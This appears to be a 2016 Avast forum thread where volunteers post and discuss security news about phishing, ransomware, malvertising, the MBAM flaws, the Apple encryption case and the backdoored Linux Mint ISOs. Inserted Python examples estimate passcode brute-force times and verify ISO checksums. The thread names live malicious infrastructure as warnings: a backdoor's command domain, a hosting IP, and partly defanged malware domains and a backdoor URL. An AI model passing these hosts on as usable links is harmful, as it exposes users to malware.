Don't worry David, I have saved my Outpost Pro installation file and backed up the FW settings, and I already downloaded the latest version 20 mins ago ;)
-
(http://screencast-o-matic.com/screenshots/u/Lh/1453383408263-60597.png)
It's a phishing attempt not a way for you to get $100.00 from McDonald's
-
Tech Support Scammers Lure Users With Fake Norton Warnings, Turn Out To Be Symantec Reseller
https://blog.malwarebytes.org/fraud-scam/2016/01/tech-support-scammers-lure-users-with-fake-norton-warnings-turn-out-to-be-symantec-reseller/?utm_source=gplus&utm_medium=social
-
Trojan for Android pre-installed. Philips pushes an update: http://news.drweb.com/show/?i=9792&lng=en&c=5
polonus
-
CryptoWall 4.0 Spreading via Angler Exploit Kit
http://www.securityweek.com/cryptowall-40-spreading-angler-exploit-kit
-
Linux malware: Second screen-grabbing Trojan surfaces in space of a week
http://www.zdnet.com/article/linux-malware-second-screen-grabbing-trojan-surfaces-in-space-of-a-week/
-
How many times we report various WordPress insecurities on websites: Outdated versions of the CMS, plug-ins, issues with themes, user enumeration and directory listing enabled :o etc. etc.
Now see where that could lead to: http://news.netcraft.com/archives/2016/01/21/brazil-gov-website-serving-up-phish-and-malware-again.html
Pondus, eddy, Para-Noid, polonus and many others continuously warning and warning, reporting and reporting in the "virus and worms" and this info all falls on deaf ears. When will those website admins finally get informed about what threats they may expose their visitors to ???
polonus (volunteer website security analyst and website error-hunter)
-
How many times we report various WordPress insecurities on websites: Outdated versions of the CMS, plug-ins, issues with themes, user enumeration and directory listing enabled :o etc. etc.
Now see where that could lead to: http://news.netcraft.com/archives/2016/01/21/brazil-gov-website-serving-up-phish-and-malware-again.html
Pondus, eddy, Para-Noid, polonus and many others continuously warning and warning, reporting and reporting in the "virus and worms" and this info all falls on deaf ears. When will those website admins finally get informed about what threats they may expose their visitors to ???
polonus (volunteer website security analyst and website error-hunter)
No wonder when they run outdated Debian, PHP and maybe more.
-
LeChiffre, Ransomware Ran Manually
https://blog.malwarebytes.org/intelligence/2016/01/draft-lechiffre-a-manually-run-ransomware/
-
Mozilla Delays Add-On Signing in Firefox Once Again
http://news.softpedia.com/news/mozilla-delays-add-ons-signing-in-firefox-once-again-499335.shtml
-
Security updates available for Foxit Reader and Foxit PhantomPDF 7.3
https://www.foxitsoftware.com/support/security-bulletins.php
-
[openssl-announce] Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2016-January/000058.html
-
Rogue Google Chrome Extension Spies On You
https://blog.malwarebytes.org/online-security/2016/01/rogue-google-chrome-extension-spies-on-you/?utm_source=Gplus&utm_medium=social
More Fake Facebook “Security System Page” Scams
https://blog.malwarebytes.org/fraud-scam/2016/01/more-fake-facebook-security-system-page-scams/?utm_source=Gplus&utm_medium=social
Hacking your head: How cyber criminals use social engineering
https://www.malwarebytes.org/articles/hacking-your-head-how-cyber-criminals-use-social-engineering/?utm_source=gplus&utm_medium=social
edit: additional
-
Magento vulnerable to Cross-Site Scripting attack: https://blog.sucuri.net/2016/01/security-advisory-stored-xss-in-magento.html
Long known flaw for which a patch exists: https://magento.com/security/patches/supee-7405
still a lot of websites with Magento may be vulnerable to such an exploit.
polonus
-
Lenovo ShareIT Multiple Vulnerabilities
http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities
-
Whatever side wins, the end-user will lose: http://www.cbc.ca/news/business/microsoft-and-other-tech-giants-fight-u-s-right-to-seize-cloud-data-1.2677688
polonus
-
Javascript could really be bad and mean big trouble depending on certain circumstances and where it may have access. For those that use it or evaluate it, read here and get the creeps: http://www.moock.org/lectures/troublewithjs/
polonus (volunteer website security analyst and website error-hunter)
-
Wave Goodbye to the Java Plugin (if you have not already)
http://www.ghacks.net/2016/01/29/wave-goodbye-to-the-java-plugin-if-you-have-not-already/
-
Elaborate iCloud Phish Used To Activate Stolen iPhones
https://blog.malwarebytes.org/phishing/2016/01/elaborate-icloud-phish-used-to-activate-stolen-iphones-2/?utm_source=gplus&utm_medium=social
Rotten Tomatoes, Jerusalem Post And Other Publishers Victim Of Ongoing Malvertising Campaign
https://blog.malwarebytes.org/malvertising-2/2016/01/rotten-tomatoes-jerusalem-post-and-other-publishers-victim-of-ongoing-malvertising-campaign/?utm_source=Gplus&utm_medium=social
App Update Tool Could Endanger iOS Users
https://blog.malwarebytes.org/mac/2016/01/app-update-tool-could-endanger-ios-users/?utm_source=gplus&utm_medium=social
-
@Para-Noid,
Dear Craig, these mal-ads were detected at: -rottentomatoes.com, -makeuseof.com, -lifebuzz.com, -fanatik.com.tr, -autoblog.com, -boredomtherapy.com, -leagueoflegends.wikia.com, -blitz.bg & -jpost.com. As to now it is unknown to what extent these warned ad-networks have removed the infested ads.
your Avast forum friend,
Damian
P.S. Users are really better protected having a decent adblocker up and running ;)
-
P.S. Users are really better protected having a decent adblocker up and running ;)
And I find Adguard is a much better and stronger adblocker if I'm not mistaken Sherlock ;)
-
Hi SpeedyPC,
You take the words right out of my mouth.
I am beta testing Adguard and I can second
what you say there is the truth, the whole truth and nothing but the truth. ;)
polonus
-
VirusTotal: Putting the spotlight on firmware malware
http://blog.virustotal.com/2016/01/putting-spotlight-on-firmware-malware_27.html
-
Qihoo 360 inappropriate behavior
Testing bodies AV‐Comparatives, AV‐TEST and Virus Bulletin comment on
allegations of inappropriate behavior
pdf.doc > https://www.av-test.org/fileadmin/pdf/VB-AVC-AVT-press-release.pdf
-
MBAM vulnerable: https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulnerability-disclosure/
Specific MBAM server and user software issues were found, but have not been revealed yet.
Remarkable that a Google security staff member detects such issues and the MBAM security staff have not... :o
pol
-
MBAM vulnerable: https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulnerability-disclosure/
Specific MBAM server and user software issues were found, but have not been revealed yet.
Remarkable that a Google security staff member detects such issues and the MBAM security staff have not... :o
pol
Why is that remarkable ??? Google does have some pretty savvy people working for them. :)
-
Hi bob3160,
That was just now what I did not want to say. Maybe I phrased it so that people like you misunderstood.
Must be my Dutch line of making an argument... ;)
I really meant to say "Why had it just to be a Google Security Researcher, like Tavis Ormandy, who found these various MBAM security holes, while MBAM staff also have very qualified people, that did not detect the issues, while they were going over the MBAM server and client software?????" Are they coming into the same ICT class as Ormandy does? Are they well-willing non-professional g33ks?
So it was just the other way round actually. I did not question the savviness of the Google Security Researcher as such, but rather the ability of the MBAM folks, but then when you are always with your eyes almost fixed onto the MBAM window-pane, you might miss out some wider scope, a form of "fixation" and recurring "attitudes". Or they are just second- or sub-class researchers.
Damian
-
It is always easier for a total outsider to look at things with clearer eyes.
I think this was the case with Google looking for vulnerabilities.
Wonder if the reverse would reveal something about Google's security or lack thereof ???
-
Hi bob3160,
Here we touch common ground, fully agree with you ;)
Damian
-
http://www.theregister.co.uk/2016/02/02/malwarebytes_0day/
-
Right you are, Eddy,
Ormandy has proven to be "a necessary irritant" for detecting the security shortcomings of anti-virus products, in software from Trend Micro, ESET, FireEye, Kaspersky and Avast security products.
polonus
-
This now raises the following question :
Till this vulnerability is plugged, is it safer to stop using MBAM, or should you still continue to use the product
despite the security holes ???
As far as I know, these vulnerabilities have not yet been exploited.
I also don't see this being discussed on their forum ???
-
@bob3160,
You would be extremely unlucky if you were hit, as only targeted attacks would work as far as I have understood. MBAM will come up with a new version to update to any time now, and they are also working furiously to mitigate the server-side issues Ormandy has reported. And bob3160, before you or whoever else here would come under fire, the attackers have to pass Avast's defenses first, and then they get caught between the front gate and the main gate. I personally would not worry that much about a "walkthrough" with a MBAM update. See the additional problems: https://mxtoolbox.com/domain/www.malwarebytes.org/
MBAM's advisory on the issue: https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulnerability-disclosure/
More to worry about now from Chromodo!
Uninstall costs you as much as installing, free: https://code.google.com/p/google-security-research/issues/detail?id=704
users who install Comodo Internet Security may not realize that their Chrome installation is replaced with Comodo's own browser, Chromodo.
That little bit of crapware isn't secure at all: it's set as the default browser, and "all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices," Google's Tavis Ormandy notes.
Quoted here is: http://www.theregister.co.uk/2016/02/02/google_disses_chromodo/
polonus
-
Comodo and I have a long history as you probably already know. :)
I don't have to worry about their product and their vulnerabilities because I personally would never use any of their products.
-
Hi bob3160,
Well I have read enough about Comodo to keep my fingers off of it. And now free Let's Encrypt has been targeted by cybercrooks to abuse it to secure and harden their malcreations. Yep, certainly the https-everywhere mission has its darker sides as well. Read here what Trend Micro reports: http://www.theregister.co.uk/2016/01/07/net_scum_getting_lets_encrypt_certs_for_malware/
It is an insecure world, bob3160, and it is hard to come by just on a smile....
polonus
-
These types of offers are acted upon all too often:
(http://screencast-o-matic.com/screenshots/u/Lh/1454502213706-10244.png)
Clicking on that link sends you here: (http://screencast-o-matic.com/screenshots/u/Lh/1454502895690-72064.png) which is certainly not connected to Amazon Prime or any other part of Amazon.
Hover your mouse over any descriptive link and you'll see the actual link address on the bottom left side of your screen.
It's almost always a dead giveaway of an attempted scam or Phishing attempt.
Be careful, it's a dangerous world out there. :o
-
http://www.theregister.co.uk/2016/02/04/dridex_botnet_pwned/ ;D
-
Hi Eddy this is a form of dedicated sink-holing then, ;D
Clever strategy, but counter-hacking malicious payload is a strange way of propagating an AV software.
I wonder if it isn't whitehat hacking with a tinge of blackhat activity to it,
especially if you neither would like to have Dridex nor Avira's.
According to Dutch law we call this "eigen richting" and it is not allowed according to our judiciary system.
polonus
-
Massive Admedia/Adverting iFrame Infection
WordPress under massive attack from hackers injecting encrypted code at the end of all legitimate .js files,
https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html
link article author = Sucuri's Denis Sinegubko.
In case of this infection, the easiest way is to check any .js files if they have the malware at the very bottom.
Additional reason never to go without a decent adblocker and a cookie cruncher!
polonus
-
http://www.theregister.co.uk/2016/02/05/avast_spoons_browser_patch_as_google_cleaver_yells_your_forks_forked/
-
Fake Amazon Mail Phishes for Login, Payment Information
https://blog.malwarebytes.org/fraud-scam/2016/02/fake-amazon-mail-phishes-for-login-payment-information/?utm_source=Gplus&utm_medium=social
10 easy steps to clean your infected computer
https://www.malwarebytes.org/articles/10-easy-steps-to-clean-your-infected-computer/?utm_source=Gplus&utm_medium=social
BleepingComputer Defends Freedom of Speech
https://blog.malwarebytes.org/news/2016/02/bleepingcomputer-defends-freedom-of-speech/?utm_source=gplus&utm_medium=social
Gossip Site TMZ, Latest Victim of Malvertising Campaign
https://blog.malwarebytes.org/malvertising-2/2016/02/gossip-site-tmz-latest-victim-of-malvertising-campaign/?utm_source=gplus&utm_medium=social
-
Data breach in China: 100 million records used to hack 20 million Taobao users
https://nakedsecurity.sophos.com/2016/02/05/data-breach-in-china-100-million-records-used-to-hack-20-million-taobao-users/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
-
Oracle Security Alert for CVE-2016-0603
http://www.oracle.com/technetwork/topics/security/alert-cve-2016-0603-2874360.html
-
DayZ in a Daze: Forum Breach Confirmed
https://blog.malwarebytes.org/hacking-2/2016/02/dayz-in-a-daze-forum-breach-confirmed/?utm_source=gplus&utm_medium=social
The Malware Museum offers a look at the viruses of yesteryear
http://www.slashgear.com/the-malware-museum-offers-a-look-at-the-viruses-of-yesteryear-06425817/
Mysterious spike in WordPress hacks silently delivers ransomware to visitors
http://arstechnica.com/security/2016/02/mysterious-spike-in-wordpress-hacks-silently-delivers-ransomware-to-visitors/
-
Steam uses an insecure version of Chrome without the sandbox: https://github.com/ValveSoftware/steam-for-linux/issues/4292
pol
-
Russian Ruble rate was manipulated by malware hackers: https://www.bloomberg.com/news/articles/2016-02-08/russian-hackers-moved-currency-rate-with-malware-group-ib-says
polonus
-
DMA Locker Strikes Back
https://blog.malwarebytes.org/intelligence/2016/02/dma-locker-strikes-back/
sample > ( 4 hours, 17 minutes ago )
https://www.virustotal.com/en/file/b7eeb0746b8e5df88c9937463db3f12a07ed3cf62ff720c6c91b8610080f2d9c/analysis/
-
Making email safer for you
http://gmailblog.blogspot.co.uk/2016/02/making-email-safer-for-you-posted-by.html
-
Microsoft Security Bulletin Summary for February 2016
https://technet.microsoft.com/en-us/library/security/ms16-feb
-
Play Your Part for a Better Internet
https://blog.malwarebytes.org/online-security/2016/02/play-your-part-for-a-better-internet/?utm_source=gplus&utm_medium=social
Malware: Understanding the enemy
http://www.itproportal.com/2016/02/10/malware-understanding-the-enemy/
-
Phishing campaign redirects users to a fake Netflix website and steals payment card details
http://www.arnnet.com.au/article/593898/cyber-criminals-hack-netflix-symantec/
-
How to Avoid Potentially Unwanted Programs
https://blog.malwarebytes.org/online-security/2016/02/how-to-avoid-potentially-unwanted-programs/?utm_source=gplus&utm_medium=social
-
posted 2013
Cyber Criminals Hate Brian Krebs So Much They Sent Heroin and SWAT Teams to His Home
http://www.vice.com/read/i-interviewed-the-fraudster-who-frames-people-for-heroin-possession
-
Hackers are holding a California hospital’s network hostage for $3.6 million
http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital
-
OSX Ransomware Offered for Sale in the Underground
http://www.infosecisland.com/blogview/24699-OSX-Ransomware-Offered-for-Sale-in-the-Underground.html
-
Hackers are holding a California hospital’s network hostage for $3.6 million
http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital
Amazing that they don't have a viable backup in place. The Hospital also needs to take some of the blame
for not being more careful with their patients' records.
-
U.S. federal magistrate judge ordered Apple to backdoor an iPhone.
Read: https://www.eff.org/deeplinks/2016/02/eff-support-apple-encryption-battle
Real security and the rights of customers is at stake.
polonus
-
U.S. federal magistrate judge ordered Apple to backdoor an iPhone.
Read: https://www.eff.org/deeplinks/2016/02/eff-support-apple-encryption-battle
Real security and the rights of customers is at stake.
polonus
So is national security. It will be interesting who wins this battle.
I'm not a betting man but don't hold out too much hope for our own personal privacy rights. :(
-
U.S. federal magistrate judge ordered Apple to backdoor an iPhone.
Read: https://www.eff.org/deeplinks/2016/02/eff-support-apple-encryption-battle
Real security and the rights of customers is at stake.
polonus
So is national security. It will be interesting who wins this battle.
I'm not a betting man but don't hold out too much hope for our own personal privacy rights. :(
If a back door already exists, then it should be allowed to be used on this individual case.
If, as Apple claims, such a tool doesn't exist, then the Feds are asking to create a crack in the personal liberties armor.
I don't know how any one can be comfortable with that.
-
Yes, if this is all true the judge actually will have asked Apple to write a backdoor into their own proprietary code, one that does not exist already, to enable the brute force attack the government has in mind.
While they insist it is only and exclusively for mentioned case, there is no guarantee it won't spread and it is also undermining general security measures against criminals that come to abuse such a backdoor. There is at least one person comfortable with this order and that person is Donald Trump who now says: "We should have access to that iPhone" read: http://uk.businessinsider.com/donald-trump-apple-phone-san-bernardino-2016-2
polonus
-
Politics aside, I still wonder if such a tool wasn't created before the feature was made available. ???
-
Hi bob3160,
There is a lot of speculation about this.
Will we ever really know?
I doubt that very much.
polonus
-
WordPress Compromise Campaign: From Nuclear EK To Angler EK
https://blog.malwarebytes.org/exploits-2/2016/02/wordpress-compromise-campaign-from-nuclear-ek-to-angler-ek/?utm_source=gplus&utm_medium=social
A Message to Our Customers (Wasn't sure where to post this.)
http://www.apple.com/customer-letter/
edit: additional
-
Unfortunately I read the Apple letter as a sales gimmick... Buy the iPhone and you can do what you like. We don't care, we just want your money
-
Unfortunately I read the Apple letter as a sales gimmick... Buy the iPhone and you can do what you like. We don't care, we just want your money
I agree and I also think that the backdoor is already there just not something Apple wants to talk about. :)
-
Hackers are holding a California hospital’s network hostage for $3.6 million
http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital
Hospital pays $17,000 ransom to get access back to its encrypted files
http://www.networkworld.com/article/3034537/hospital-pays-17000-ransom-to-get-access-back-to-its-encrypted-files.html?token=%23tk.NWWNLE_nlt_networkworld_daily_news_alert_2016-02-18&idg_eid=52948c736ecce9e676edc4c93f707d83&utm_source=Sailthru&utm_medium=email&utm_campaign=NWW%20Daily%20AM%20Alert%202016-02-18&utm_term=networkworld_daily_news_alert#tk.NWW_nlt_networkworld_daily_news_alert_2016-02-18
-
Hackers are holding a California hospital’s network hostage for $3.6 million
http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital
Hospital pays $17,000 ransom to get access back to its encrypted files
http://www.networkworld.com/article/3034537/hospital-pays-17000-ransom-to-get-access-back-to-its-encrypted-files.html?token=%23tk.NWWNLE_nlt_networkworld_daily_news_alert_2016-02-18&idg_eid=52948c736ecce9e676edc4c93f707d83&utm_source=Sailthru&utm_medium=email&utm_campaign=NWW%20Daily%20AM%20Alert%202016-02-18&utm_term=networkworld_daily_news_alert#tk.NWW_nlt_networkworld_daily_news_alert_2016-02-18
Another entity clearly not prepared for a disaster and not creating backups. You would expect this from a novice but not a hospital. :(
https://www.youtube.com/watch?v=hZy5in3WNe4
-
it could be that the encrypted data were short term but important for the treatments ...
sadly that talking in public about ransom payments will encourage more attacks on public service organizations
-
Comodo has put their users at risk through predictable passwords :o
https://twitter.com/taviso/status/700422594550325248
polonus
-
When penguins attack - Linux's role in the malware ecosystem
Nearly 80% of the servers online used for malicious web pages are using Unix or Linux hosts.
http://www.irongeek.com/i.php?page=videos/bsidesboston2015/200-when-penguins-attack-linuxs-role-in-the-malware-ecosystem-chester-wisniewski
-
This jQuery plug-in may enhance a lot of security issues on websites:
Issues could be critical. For instance here:
jquery-migrate - 1.2.1 : -http://www.wide-netzwerk.at/media/jui/js/jquery-migrate.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
Read: https://github.com/jquery/jquery-migrate/blob/master/warnings.md
and: https://stackoverflow.com/questions/21882731/how-to-use-jquery-migrate-plugin
polonus (volunteer website security analyst and website error-hunter)
-
Find My iPhone, iCloud Lead Cops to Kidnapped Teen
http://www.nbcnews.com/news/us-news/find-my-iphone-icloud-lead-cops-kidnapped-teen-n521486
-
What would happen if you used a longer passcode on your iPhone?
What if you use a longer passcode? Here’s how long the FBI would need:
seven-digit passcodes will take up to 9.2 days, and on average 4.6 days, to crack
eight-digit passcodes will take up to three months, and on average 46 days, to crack
nine-digit passcodes will take up to 2.5 years, and on average 1.2 years, to crack
10-digit passcodes will take up to 25 years, and on average 12.6 years, to crack
11-digit passcodes will take up to 253 years, and on average 127 years, to crack
12-digit passcodes will take up to 2,536 years, and on average 1,268 years, to crack
13-digit passcodes will take up to 25,367 years, and on average 12,683 years, to crack
article quote author = Mac Slavo.
pol
-
Free Youtube Downloader PUP is just another Tech Support Scam
https://blog.malwarebytes.org/social-engineering/2016/02/free-youtube-downloader-pup-is-just-another-tech-support-scam/?utm_source=gplus&utm_medium=social
The Phishy Accountant: Something Doesn’t Add Up
https://blog.malwarebytes.org/phishing/2016/02/the-phishy-accountant-something-doesnt-add-up/?utm_source=gplus&utm_medium=social
-
Want to destroy an iPhone? Set the date to January 1, 1970
http://www.digitaltrends.com/mobile/bricked-iphone-january-1-1970/
hmm ... of course, you turn it back to before it was born so it does not know it exists ;D
-
Want to destroy an iPhone? Set the date to January 1, 1970
http://www.digitaltrends.com/mobile/bricked-iphone-january-1-1970/
hmm ... of course, you turn it back to before it was born so it does not know it exists ;D
Unplugging the battery and reconnecting it will reset the current date and fix the phone.
-
Malwarebytes receives $50M funding
https://youtu.be/6ScDyNoxQOs
-
What would happen if you used a longer passcode on your iPhone?
What if you use a longer passcode? Here’s how long the FBI would need:
seven-digit passcodes will take up to 9.2 days, and on average 4.6 days, to crack
eight-digit passcodes will take up to three months, and on average 46 days, to crack
nine-digit passcodes will take up to 2.5 years, and on average 1.2 years, to crack
10-digit passcodes will take up to 25 years, and on average 12.6 years, to crack
11-digit passcodes will take up to 253 years, and on average 127 years, to crack
12-digit passcodes will take up to 2,536 years, and on average 1,268 years, to crack
13-digit passcodes will take up to 25,367 years, and on average 12,683 years, to crack
article quote author = Mac Slavo.
pol
Personally I can't see how they can come up with these figures. Who knows how many systems/GHz of processing power they can throw at the task. I'm sure the FBI wouldn't say.
But the reason for having strong passwords shouldn't have anything to do with the FBI, but preventing minor levels of hacking by criminals.
It also doesn't differentiate on these number of digits, being all numeric or alphabetic or containing special characters and or Upper/Lower case. As a mixed case, alphanumeric passcode would be much longer or the single case alpha or numeric passcode much quicker.
Not to mention who you actually are and why they might even be interested in you.
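Added example (not from the quoted article or from any poster here) that works through both points above: the quoted table's "up to" and "on average" figures, and DavidR's remark that the character set matters as much as the length. The per-guess delay of 80 ms is an assumption chosen because it reproduces the article's numbers (10^7 guesses at 0.08 s is about 9.26 days); the page itself states no rate.

```python
"""Brute-force time estimates for device passcodes (added example)."""

SECONDS_PER_DAY = 86_400
SECONDS_PER_YEAR = 365.25 * SECONDS_PER_DAY

# Assumed cost of one guess. 80 ms is an assumption: it reproduces the
# quoted table (10**7 * 0.08 s ~= 9.26 days); the page states no rate.
DEFAULT_SECONDS_PER_GUESS = 0.08

# Alphabet sizes used to illustrate the charset point: the same length
# is far stronger when each position can take more values.
CHARSETS = {"digits": 10, "lowercase": 26, "mixed alnum": 62}


def keyspace(length: int, charset_size: int) -> int:
    """Number of distinct passcodes of a given length over a charset."""
    if length < 1 or charset_size < 2:
        raise ValueError("need length >= 1 and charset_size >= 2")
    return charset_size ** length


def crack_time_seconds(length, charset_size=10,
                       seconds_per_guess=DEFAULT_SECONDS_PER_GUESS):
    """Return (worst_case, average) seconds for an exhaustive guess.

    Worst case exhausts the keyspace; an average successful search covers
    half of it, which is why the table's 'on average' is half its 'up to'.
    """
    worst = keyspace(length, charset_size) * seconds_per_guess
    return worst, worst / 2


def crack_time_days(length, charset_size=10,
                    seconds_per_guess=DEFAULT_SECONDS_PER_GUESS):
    """Same as crack_time_seconds, expressed in days."""
    worst, avg = crack_time_seconds(length, charset_size, seconds_per_guess)
    return worst / SECONDS_PER_DAY, avg / SECONDS_PER_DAY


def crack_time_years(length, charset_size=10,
                     seconds_per_guess=DEFAULT_SECONDS_PER_GUESS):
    """Same as crack_time_seconds, expressed in (Julian) years."""
    worst, avg = crack_time_seconds(length, charset_size, seconds_per_guess)
    return worst / SECONDS_PER_YEAR, avg / SECONDS_PER_YEAR


def human(seconds: float) -> str:
    """Format a duration in the largest convenient unit."""
    if seconds < SECONDS_PER_DAY:
        return f"{seconds / 3600:.1f} hours"
    if seconds < SECONDS_PER_YEAR:
        return f"{seconds / SECONDS_PER_DAY:.1f} days"
    return f"{seconds / SECONDS_PER_YEAR:,.1f} years"


def table(lengths=range(7, 14), charset_size=10):
    """Rows of (length, worst, average) seconds, matching the quoted table."""
    return [(n, *crack_time_seconds(n, charset_size)) for n in lengths]


if __name__ == "__main__":
    for n, worst, avg in table():
        print(f"{n:2d}-digit: up to {human(worst)}, on average {human(avg)}")
    # Same length, bigger alphabet: under this model a 6-character
    # mixed-case alphanumeric code outlasts a 10-digit numeric one.
    for label, size in CHARSETS.items():
        worst, _ = crack_time_seconds(6, size)
        print(f"6 chars from {label:<12}: up to {human(worst)}")
```

Changing `seconds_per_guess` is the knob for DavidR's objection about unknown processing power: the model only holds while the device enforces a delay per attempt, which is exactly what the attacker wants removed.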
-
Uncle Sam Loves Windows 10: US Department Of Defense To Upgrade 4 Million Computers To Microsoft's Latest OS
http://www.techtimes.com/articles/134636/20160218/uncle-sam-loves-windows-10-us-department-of-defense-to-upgrade-4-million-computers-to-microsofts-latest-os.htm
-
More and more adblocker nag screens being brought in during recent days here in the Netherlands.
Saw more and more messages pop-up that go something like the quote I give as an example.
I completely adblock solely because of security reasons and keep blocking because so far no one could convince me of the fact I will no longer be bothered by malicious ads or being exposed to adware. Now I have to look at nag screens like this for instance: Dear visitor,
We noticed you use an adblocker so you can no longer see ads on website whatsever serving ads dot com. We think this is a pity, because you will have free access to this site also because of the ads we show. Will you exclude our website by whitelisting our website?
Well this is not completely true because they will earn from my browser history, my ID tracking, my fingerprinting, my profiling, my cookies, so a thousand other ways than just the ads I block.
Why this concerted action then against adblocking? Why not try to take away the need for adblocking, so no more blackhat SEO redirects, no more fraudulent ad clicks, no more infestive malicious ads, no more browser hijacking. When earnest, upright and secure ads could be guaranteed I would be the first to hand in my ad- and script blocker, but inside the existing malcoded jungle I would not give up one of the last resorts to defend myself that I have got left.
polonus
-
Linux Mint ISOs hacked: backdoored Linux Mint 17.3 Cinnamon Edition links were uploaded: https://twitter.com/Linux_Mint/status/701222478178340864
and it goes further unto darkweb: https://twitter.com/ydklijnsma/status/701331196769394688
The hacked ISOs are hosted on 5.104.175.212 and the backdoor connects to absentvodka.com
And linux-mint was not even aware while they were being hacked twice.
The hackers allegedly abused WordPress and poor polonus and others,
here in "the virus and worms", warn about WordPress insecurity all of the time,
so all our efforts to make CMS less insecure until now are completely in vain
-WordPress insecurity continues grand time.... :( :( :(
polonus
P.S. Why did they not check :o https://help.ubuntu.com/community/VerifyIsoHowto
D
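The P.S. above points at the check that catches a swapped image. As an added example (not the Mint project's code and not from the linked how-to), here is the checksum half of that procedure in Python: hash the downloaded image in chunks and compare it with the entry in a coreutils-style sha256sum.txt. The file names and contents are constructed for the demo.

```python
"""Verify a downloaded image against a published sha256sum.txt (added example)."""
import hashlib
import os
import tempfile


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hex SHA-256 of a file, read in chunks so multi-GB images fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def parse_sha256sums(text: str) -> dict:
    """Parse 'sha256sum' output into {filename: hexdigest}.

    Lines look like '<hex>  <name>' or '<hex> *<name>' (binary mode);
    blank lines and '#' comments are skipped, malformed lines are rejected.
    """
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition(" ")
        name = name.strip().lstrip("*")
        if not sep or len(digest) != 64 or not name:
            raise ValueError(f"malformed sha256sum line: {line!r}")
        sums[name] = digest.lower()
    return sums


def verify_image(image_path: str, sums_text: str) -> str:
    """Return 'ok', 'mismatch' or 'unlisted' for the image against the sums."""
    expected = parse_sha256sums(sums_text).get(os.path.basename(image_path))
    if expected is None:
        return "unlisted"
    return "ok" if sha256_file(image_path) == expected else "mismatch"


def build_demo(root: str) -> dict:
    """Write constructed sample files and return their paths.

    'good' is the listed image, 'bad' is a same-named copy from a second
    mirror with extra bytes appended, 'other' is not in the sums file.
    """
    name = "demo-distro-17.3.iso"            # constructed file name
    mirror = os.path.join(root, "mirror")
    os.makedirs(mirror, exist_ok=True)
    good = os.path.join(root, name)
    bad = os.path.join(mirror, name)
    other = os.path.join(root, "unlisted.iso")
    payload = b"ISO9660 demo payload\n" * 1024
    with open(good, "wb") as f:
        f.write(payload)
    with open(bad, "wb") as f:
        f.write(payload + b"extra bytes appended\n")
    with open(other, "wb") as f:
        f.write(b"something else\n")
    sums = os.path.join(root, "sha256sum.txt")
    with open(sums, "w") as f:
        f.write(f"{sha256_file(good)} *{name}\n")
    return {"good": good, "bad": bad, "other": other, "sums": sums}


def run_demo() -> dict:
    """Build the samples in a temp dir and return the verdict for each."""
    with tempfile.TemporaryDirectory() as root:
        paths = build_demo(root)
        with open(paths["sums"]) as f:
            sums_text = f.read()
        return {k: verify_image(paths[k], sums_text)
                for k in ("good", "bad", "other")}


if __name__ == "__main__":
    print(run_demo())
```

The comparison is only as good as the sums file: if that file comes from the same place as the image, an attacker who can replace one can replace both, so the how-to's GPG step (checking the signature on the sums file against a key obtained separately) is the part that actually anchors trust.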
-
Look here: https://forum.avast.com/index.php?topic=127517.msg1294527#msg1294527
Another example of the fact that the majority of WordPress websites and websites with jQuery libraries have outdated and retirable or left code, have insecure configurations and form a daily threat to all users that visit such sites.
Many of these websites have become infested, compromised, hacked and defaced. And nobody outside a couple of forum users like our friends Pondus, Asyn, Eddy, others and little old me give this any attention.
......And of course the Avast Team that does all in its capacity to keep us out of harm's way......
polonus
-
The implications from weak WordPress security and weak signatures for the Backdoored Linux distribution threat are now obvious.
Re: https://securelist.com/blog/incidents/73893/beware-of-backdoored-linux-mint-isos/ link article author = Stefan Ortloff
Also forum hacks seem to be getting more popular, as the Linux Mint blog forum was also hacked by the cybercriminal.
There should be more attention given to website security in general and folks that put users at risk knowingly, should be held responsible.
Now everybody just shrugs their shoulders and continues as usual, often recklessly and utterly unconcerned about what happened. There is just quick money to cash and insecurity is not our main concern; when trapped we move elsewhere. Often sociopaths operate in such ways. Utterly irresponsible behavior sets them apart, and these characters often populate just the very regions where the decisions are being made, and they are often very successful in the bliss of their total ignorance. ;D
polonus
-
(http://screencast-o-matic.com/screenshots/u/Lh/1456171425672-47587.png)
Block details
Your IP: xx.xxx.xx.xxx
URL: hxxps://sitecheck.sucuri.net/results/j10futbol.us/plugins/interoffice.php
Your Browser: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.54 Safari/537.36
Block ID: BAK024
Block reason: Access to a backdoor or suspected location was denied.
Time: Mon, 22 Feb 2016 14:59:44 -0500
Server ID: cp14007
It's a dangerous world out there......
-
Well Google Safebrowsing is getting better and better at alerting. Probably would have had notification of others as well, Bitdefender TrafficLight, as MBAM blocks links there to: -magicorganicmarket.ru and -medicalfirstmall.xyz
see: -https://urlquery.net/report.php?id=1456179224812 (I broke all the links for those that would get alerts!).
And when too much of the code (without payload) is shown inside a scan result, you'd get alerts. Avast Webshield does the same and also whenever there is a slight chance it is real malcode or not. Better safe than sorry, is the message here.
Look here why it is detected: -http://www.isithacked.com/check/http%3A%2F%2Fj10futbol.us%2Fplugins%2Finteroffice.php
There is a difference of 833 bytes between the version of the page you serve to Chrome and the version you serve to GoogleBot. This probably means some code is running on your site that's trying to hide from browsers but make Google think there's something else on the page. Link might be dangerous, and we already knew this from the blacklisting.
greets,
pol
